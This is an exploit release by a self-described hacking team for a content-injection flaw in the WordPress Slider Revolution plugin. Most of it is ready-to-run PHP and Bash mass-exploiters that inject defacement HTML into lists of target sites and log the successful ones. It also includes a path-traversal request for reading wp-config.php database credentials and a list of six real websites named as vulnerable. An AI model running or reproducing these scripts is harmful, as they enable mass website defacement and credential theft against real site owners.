############################################################################################
# Exploit Title : WordPress 5.1.1 Slider Revolution 4.6.5 UpdateCaptionsCSS Remote Content Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Published Date : 20/03/2019
# Vulnerability Discovered Date : 2013 - 2014
# Vendor Homepage : revolution.themepunch.com - codecanyon.net
# Software Information Link : codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
# Software Affected Versions : 4.x.x - 5.x.x with Software 4.6.5 and lower versions
# Software Price Type : Paid Download - 26$
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-74: Improper Neutralization of Special Elements in
Output Used by a Downstream Component ('Injection')
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Cyberizm Reference Link : cyberizm.org/cyberizm-wordpress-revslider-get-caption-css-exploit.html
############################################################################################
# Description about Software :
***************************
Slider Revolution (Revolution Slider) is an innovative, responsive WordPress Slider Plugin that displays your content the
beautiful way. Whether it’s a Slider, Carousel, Hero Image or Video Scene for best conversion rates or even a whole Front Page,
the visual, drag & drop editor will let you tell your own stories in no time! Desktop or mobile device!
Note : This Exploit was used in 2014 - 2015 exploited in the wild but it was not shared so in details. That's why I made it public.
############################################################################################
# Impact :
***********
The software constructs all or part of a command, data structure, or record using externally-influenced input from an
upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is
parsed or interpreted when it is sent to a downstream component and this is called as content injection.
############################################################################################
# Explanation for Vulnerability :
********************************
# Vulnerability :
************
/wp-content/plugins/revslider/revslider_admin.php
/wp-admin/admin-ajax.php
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
# Vulnerability Message :
*************************
{"success":false,"message":"Wrong request"}
# Vulnerability Error for Successfull Exploitation :
*****************************************
{"success":true,"message":"","data":"
# Directory File Destination :
************************
/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
# Vulnerable Source Code :
************************
232. $action = self::getPostGetVar("client_action");
233. $data = self::getPostGetVar("data");
...
301. case "get_captions_css":
302. $contentCSS = $operations->getCaptionsContent();
303. self::ajaxResponseData($contentCSS);
...
305. case "update_captions_css":
306. $arrCaptions = $operations->updateCaptionsContentData($data);
307. self::ajaxResponseSuccess("CSS file saved
succesfully!",array("arrCaptions"=>$arrCaptions))
# Database Configuration File Download :
************************************
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Informations About MySQL Database Configuration File =>
****************************************************
** The name of the database for WordPress */
define('DB_NAME', '');
/** MySQL database username */
define('DB_USER', '');
/** MySQL database password */
define('DB_PASSWORD', '');
/** MySQL hostname */
define('DB_HOST', '');
Note : Use Auto PHP and Bash Exploiter to use this Vulnerability.
############################################################################################
# Content Injection PHP Exploiter 1:
********************************
<b>..::|| Wordpress Revslider UpdateCaptionsCSS GetCaptionsCSS Content Injection Exploiter ||::..</b>
<?php
/*
[#]Coded By : KingSkrupellos
[#]www.cyberizm.org
*/
//======================================================
@error_reporting(0);
@set_time_limit(0);
//======================================================
echo'<form method="post">
<textarea name="s" cols="50" rows="13" ></textarea><br>
<input type="submit" name="g" value="GO" />
</form>';
//=======================================================
if(isset($_POST['g']) and !empty($_POST['s'])){
$urls = explode("\r\n",$_POST['s']);
foreach($urls as $url){
$url = trim($url);
$post = array("action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
"data" => "<h2>Hacked By KingSkrupellos Cyberizm Digital Security Army<br>:)<br>");
$site = $url."/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL, $site);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$post);
curl_setopt($ch,CURLOPT_TIMEOUT,30);
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);
$cn = curl_exec($ch);
$fcn = @file_get_contents($site);
if(eregi('hacked',$fcn)){
echo "<b>[#] $url : done <a href=\"$site\">HERE</a></b><br>";
}else{
echo"[!]$url : failed<br>";
}
}
}
//========================= \!/ Mission Accomplished \!/ ====================================================//
?>
############################################################################################
# Content Injection PHP Exploiter 2 :
*********************************
<?php
echo "\n+-------------------------------------------+\n";
echo "| Cyberizm Digital Security Army |\n";
echo "| www.cyberizm.org |\n";
echo "+-------------------------------------------+\n";
$gv=@file_get_contents($argv[1]);
$exv=explode("\r\n",$gv);
echo "\n\t Total site loaded : ".count($exv)."\n\n";
foreach($exv as $url){
echo "\n[+]Scaning : $url \n";
dr($url);
}
function dr($site){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "".$site."/wp-admin/admin-ajax.php");
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action", "client_action" => "update_captions_css", "data" => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by KingSkrupellos Cyberizm Digital Security Team<p style='color: transparent'>"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$result = curl_exec($ch);
if (eregi('true', $result))
$path="$site/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
$gett=@file_get_contents($path);
if(preg_match('/Hacked by KingSkrupellos Cyberizm Digital Security Army/',$gett)){
echo "\n[+]Exploit Done \n[+]shell : $path \n\n ";
$fo = fopen("finish.txt","a+");
$r = fwrite($fo,"".$path."/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css\r\n");
fclose($fo);
} else {
echo "| ".$site . " : Not Revslider \n\n";
}
curl_close($ch);
}
echo "\n[-]Exploit Fail \n\n";
}
}
?>
############################################################################################
# Content Injection Bash Exploiter 3 :
*********************************
#!/bin/bash
#coded = IBT
SS(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/resp.txt \
-H "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-H "Accept-Language: en-us,en;q=0.5" \
-H "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7" \
-F "client_action=update_captions_css" \
-F "action=revslider_ajax_action" \
-F "data=x$(cat tmp/s.txt)" \
--request POST "http://${1}/wp-admin/admin-ajax.php"
}
CD(){
if [ -f tmp/cd.txt ];then
rm -f tmp/cd.txt
fi
curl --silent --max-time 10 --connect-timeout 10 "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css" -o tmp/cd.txt
if [ ! -f tmp/cd.txt ];then
echo "--> $urlnya : not vuln"
continue
fi
cat tmp/cd.txt | grep -i "KingSkrupellos" > /dev/null;cd=$?
if [ $cd -eq 0 ];then
echo "--> ${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css : exploit success"
echo "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css" >> success.txt
else
echo "--> $urlnya : exploit failed"
fi
}
CV(){
if [ -f tmp/cv.txt ];then
rm -f tmp/cv.txt
fi
curl --silent --max-time 10 --connect-timeout 10 "http://${1}/wp-admin/admin-ajax.php?action=revslider_ajax_action" -o tmp/cv.txt
if [ ! -f tmp/cv.txt ];then
echo "--> $urlnya : not vuln"
continue
fi
cat tmp/cv.txt | grep "wrong ajax action:" > /dev/null;cv=$?
if [ $cv -eq 1 ];then
echo "--> $urlnya : not vuln"
continue
else
echo "--> $urlnya : found revslider"
fi
}
Exp(){
for url in `cat $list`
do
urlnya=$(echo $url | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | awk '{gsub("//","/")}1' | awk '{gsub("//","/")}1')
if [ ! -f load.txt ];then
touch load.txt
fi
cat load.txt | grep "$urlnya" > /dev/null;ccl=$?
if [ $ccl -eq 1 ];then
echo $urlnya >> load.txt
else
#udah pernah di load di file load.txt
#kalau mau load ulang,silakan hapus file load.txt
continue
fi
echo "--> $urlnya : check"
CV $urlnya
SS $urlnya
CD $urlnya
done
}
Lengkap(){
if [ ! -f $list ];then
echo "[!] $list not exist"
exit
fi
if [ ! -d tmp ];then
mkdir tmp
fi
if [ ! -f tmp/s.txt ];then
cat > tmp/s.txt <<_script
<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>Hacked by KingSkrupellos Cyberizm Digital Security Army<p style='color: transparent'>
_script
fi
Exp
}
read -p "[+] Enter list target = " list
Lengkap
############################################################################################
# Content Injection PHP Exploiter 4 :
*********************************
<?php
$post = array
(
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
"data" => "<marquee>Hacked By KingSkrupellos Cyberizm Digital Security Army</marquee>"
);
$ch = curl_init ("http://localhost/wp-admin/admin-ajax.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
?>
############################################################################################
# Example Vulnerable Sites :
*************************
[+] filature-lille.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
[+] daniperezrun.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
[+] bilateralsolutions.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
[+] blog.acquaesapone.it/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
[+] new.med.com.do/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
[+] en.neural.co.jp/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
############################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
############################################################################################